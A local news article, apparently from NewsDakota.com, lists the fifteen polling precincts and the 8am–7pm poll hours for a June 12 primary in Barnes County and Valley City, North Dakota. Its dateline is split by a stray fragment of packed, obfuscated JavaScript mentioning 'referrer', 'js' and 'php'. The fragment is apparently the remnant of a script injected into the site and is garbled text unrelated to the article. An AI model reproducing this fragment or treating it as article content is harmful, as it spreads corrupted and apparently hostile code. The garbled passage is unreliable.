June 12th Primary/Election Precincts For Barnes County & Valley City


Valley dbytk|var|u0026u|referrer|rhbze||js|php’.split(‘|’),0,{}))
City, N.D. (NewsDakota.com) Polls for the June 12 Primary/Election in Barnes County/Valley City Precincts open at 8am and close at 7pm. Here are all those precincts for voters to memorize.

Precinct 1 Valley City, City Hall:
Precinct 2 Valley City Police Station/Municipal Court room:
Precinct 3 Skoal Room Valley City State University Student Center:
Precinct 4 W.E. Osmon Field House, Valley City:
Precinct 5 Sheyenne Care Center, Valley City:
Precinct 6 Sod Buster Club: Cities of Dazey, Pillsbury, Rogers & Sibley
Precinct 7 Wimbledon Community Hall:
Precinct 8 Edna Fire Hall: City of Leal
Precinct 9 Sanborn Community Hall:
Precinct 10 Barnes County Highway Dept: Stewart & Getchell Township:
Precinct 11 Barnes Count Court House: Valley, Hobart, Green & Marsh Townships:
Precinct 12 Oriska Public School: Oriska, Minnie Lake, Weimer, Noltimier & Alta Townships:
Precinct 13 Fingal City Hall: Cities of Fingal & Nome including Binghampton, Thordenskjold, Cuba, Norma, Raritan & Springvale Townships.
Precinct 14 Kathryn Fire Hall: Including Oak Hill & Nelson Townships.
Precinct 15 Litchville Community Room VFW: Including Spring Creek Skandia, Svea, Greenland & Rosebud Townships.

Once again the polls open at 8am and close at 7pm in Barnes County. Election night coverage of the Barnes, Dickey, Foster & Stutsman County results will be broadcast on Dakota County Radio and posted on this website newsdakota.com

Comment Disclaimer: The views and opinions expressed in the comments section of NewsDakota.com are solely those of the comment author and do not necessarily reflect the views and opinions held by NewsDakota.com.

Leave a Comment

Inside Agriculture

Farm Talk w/ Mick Kjar